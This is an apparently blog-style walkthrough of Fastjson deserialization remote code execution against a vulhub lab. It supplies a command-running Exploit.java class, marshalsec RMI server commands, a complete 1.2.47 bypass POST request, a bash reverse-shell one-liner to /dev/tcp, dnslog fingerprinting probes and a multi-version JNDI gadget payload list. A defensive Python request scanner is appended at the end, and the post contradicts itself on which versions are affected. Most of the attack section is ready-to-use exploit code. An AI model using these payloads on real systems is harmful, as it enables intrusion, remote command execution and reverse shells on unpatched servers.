0x01 Vulnerability Introduction
Fastjson is a JSON parser open-sourced by Alibaba. It performs well and is widely used in the Java projects of major vendors. Fastjson added a deserialization whitelist after version 1.2.24, but in versions before 1.2.48 attackers can use specially constructed JSON strings to bypass the whitelist check and execute arbitrary commands.
0x02 Affected scope
Fastjson < 1.2.68
The publicly disclosed bypass works against every version below 1.2.68.
0x03 Vulnerability reproduction
Let's take Fastjson 1.2.47 as the example, because vulhub conveniently provides a ready-made environment for it.
P牛, I used the 1.2.47 docker image from vulhub to test the dnslog check for fastjson, but I never receive the dnslog callback, even though the normal exp reverse shell works. I am confused.
Is my usage correct? I used this: {"@type":"java.net.Inet4Address","val":"bouaiq.dnslog.cn"}
The following is a schematic diagram of the process:
Host A: host with the Fastjson deserialization vulnerability
Host C: host serving RMI/LDAP
Host B: host serving the constructed malicious class (containing the command to be executed)
The complete remote command execution process:
1. The attacker sends the payload to host A (the payload must specify the rmi/ldap address)
2. Host A triggers the deserialization vulnerability and makes an RMI remote method call to host C
3. The RMI service on host C returns a reference pointing to the malicious Java class on host B, so host A finally loads and executes host B's malicious Java class via host C's RMI service
4. Host A executes the malicious system command
0x04 Reproduction steps
Reproduce according to the process and environment above:
Host A: http://1.1.1.1:8090 (host with the Fastjson vulnerability)
Host B: http://2.2.2.2:8888 (malicious Java class service)
Host C: rmi://2.2.2.2:9999 (remote method call service)
(Hosts B and C are actually one machine on different ports)
0x041 Construct the malicious class
The target environment is openjdk:8u102. Because this version does not yet restrict com.sun.jndi.rmi.object.trustURLCodebase, we can simply use RMI for command execution.
First compile and upload the command execution code.
Use the following payload; in it, touch /zydx666 is the system command, which can be changed as needed.
Note that the file name must be Exploit.java and this fixed structure cannot be changed.
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit {
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{
                "bash", "-c", "touch /zydx666"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        String line;
        while ((line = reader.readLine()) != null) {
            System.out.println(line);
        }
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}
Use the javac command on host B to compile Exploit.java and generate Exploit.class:
javac Exploit.java
Then start an HTTP service on host B. Any web server will do, as long as Exploit.class is reachable; here python3 is used to start a temporary one:
python3 -m http.server --bind 0.0.0.0 8888
0x042 Start the RMI remote method call service
Next, start the RMI service on host C (the codebase URL points at host B's HTTP service):
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://2.2.2.2:8888/#Exploit" 9999
marshalsec-0.0.3-SNAPSHOT-all.jar is built from https://github.com/mbechler/marshalsec
All services are now ready.
0x043 Send the payload
Next, send the Fastjson deserialization payload to host A (the vulnerable machine):
POST / HTTP/1.1
Host: 1.1.1.1:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 260
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://2.2.2.2:9999/Exploit",
"autoCommit":true
}
}
At this point host A receives the POST request, triggers the deserialization vulnerability, and finally executes the content of Exploit.class.
I am using a reverse shell command.
The reverse shell connects back successfully:
0x05 Simplified attack tool
A simplified version of the tool is provided below.
It was written by the author of https://github.com/wyzxxz/fastjson_rce_tool: a single jar that starts the RMI service and generates and serves the malicious class in one step.
Step 1: Start it on your own server:
java -cp fastjson_tool.jar fastjson.HRMIServer 1.1.1.1 8888 "bash=bash -i >&/dev/tcp/x.x.x.x/80 0>&1"
Step 2: Send the payload
The reverse shell connects back successfully.
0x06 Vulnerability detection
Determining whether an unknown target uses Fastjson when the site echoes raw error messages:
If the site echoes raw error messages, send JSON with an unclosed curly brace to trigger an error; the error output will often contain the string fastjson.
For example:
Without error echo, Fastjson can be blindly distinguished from Jackson via a DNS callback.
I use the following payload for the test:
{"zeo":{"@type":"java.net.Inet4Address","val":"745shj.dnslog.cn"}}
The dnslog record is finally received.
Even the latest version 1.2.67 can still be identified as fastjson through dnslog:
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
Malformed variant:
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
POC:
Nested inside a key such as zeo:
{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{
{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{
{"@type":"java.net.URL","val":"dnslog"}:0
0x07 Multi-version payload collection
Affected version:
fastjson<=1.2.24
exp:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}
Affected version:
fastjson<=1.2.41
Prerequisite:
autoTypeSupport must be set to true (it defaults to false since fastjson 1.2.25).
exp:
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}
Affected version:
fastjson<=1.2.42
Prerequisite:
autoTypeSupport must be set to true (it defaults to false since fastjson 1.2.25).
exp:
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
Affected version:
fastjson<=1.2.43
Prerequisite:
autoTypeSupport must be set to true (it defaults to false since fastjson 1.2.25).
exp:
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
Affected version:
fastjson<=1.2.45
Prerequisite:
autoTypeSupport must be set to true (it defaults to false since fastjson 1.2.25).
exp:
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}
Affected version:
fastjson<=1.2.47
exp:
{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://x.x.x.x:1999/Exploit",
"autoCommit": true
}
}
Affected version:
fastjson<=1.2.62
exp:
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}
Affected version:
fastjson<=1.2.66
Prerequisite:
autoTypeSupport must be set to true (it defaults to false since fastjson 1.2.25).
exp:
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}
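As an added defensive example (not code from the original post or from any of the tools it references), the following Python classifies request bodies by the payload shapes shown in 0x04, 0x06 and 0x07: the java.lang.Class cache-poisoning pattern of 1.2.47, the L...; and [ descriptor wrappers of 1.2.41 to 1.2.43, JNDI URLs, and the dnslog fingerprinting probes. Regexes are used on purpose because several payloads are deliberately malformed JSON; the sample bodies are constructed from the page's payloads, with a placeholder dnslog domain.

```python
import re
GADGET_CLASSES = {  # gadget classes from the 0x07 payloads (page values, not exhaustive)
    "com.sun.rowset.JdbcRowSetImpl", "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
    "org.apache.xbean.propertyeditor.JndiConverter", "org.apache.shiro.jndi.JndiObjectFactory",
    "br.com.anteros.dbcp.AnterosDBCPConfig", "org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
    "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
}
PROBE_CLASSES = {"java.net.Inet4Address", "java.net.Inet6Address",  # the 0x06 dnslog probes
                 "java.net.InetSocketAddress", "java.net.URL"}
# Several payloads are deliberately malformed JSON, so scan the raw body with regexes, not json.loads().
TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')
JNDI_RE = re.compile(r'\b(?:rmi|ldap|ldaps|iiop)://[^"\s]+', re.I)
# The 1.2.47 bypass: a java.lang.Class whose "val" is loaded into the class cache first.
CLASS_CACHE_RE = re.compile(r'"@type"\s*:\s*"java\.lang\.Class"\s*,\s*"val"\s*:\s*"([^"]+)"')

def normalize_type(raw: str) -> str:
    """Undo the descriptor tricks of the 1.2.41-1.2.43 payloads: leading '[' and L...; wrappers."""
    t = raw.strip().lstrip("[")
    while t.startswith("L") and t.endswith(";"):
        t = t[1:-1]
    return t

def scan_body(body: str) -> dict:
    """Classify one request body; returns the evidence found plus an overall verdict."""
    types = {normalize_type(m) for m in TYPE_RE.findall(body)}
    cached = {normalize_type(m) for m in CLASS_CACHE_RE.findall(body)}
    jndi = JNDI_RE.findall(body)
    gadgets = (types | cached) & GADGET_CLASSES
    probes = types & PROBE_CLASSES
    if gadgets and jndi:
        verdict = "exploit"      # gadget class plus an outbound JNDI reference
    elif gadgets or cached:
        verdict = "suspicious"   # autoType abuse without a visible JNDI URL
    elif probes:
        verdict = "fingerprint"  # dnslog-style "is this Fastjson?" probe
    elif types:
        verdict = "autotype"     # any @type at all is worth logging
    else:
        verdict = "clean"
    return {"verdict": verdict, "gadgets": sorted(gadgets), "probes": sorted(probes),
            "jndi": jndi, "class_cache": sorted(cached)}

# Constructed samples: the page's 1.2.47 payload, a dnslog probe (placeholder domain), a benign body.
SAMPLES = {
    "bypass_1_2_47": '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
                     '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
                     '"dataSourceName":"rmi://2.2.2.2:9999/Exploit","autoCommit":true}}',
    "dnslog_probe": '{"zeo":{"@type":"java.net.Inet4Address","val":"placeholder.dnslog.invalid"}}',
    "benign": '{"user":"alice","items":[1,2,3]}',
}
```

Run scan_body() over each body in a WAF or access-log pipeline; a "fingerprint" verdict followed by an "exploit" verdict from the same source is the sequence the walkthrough above describes.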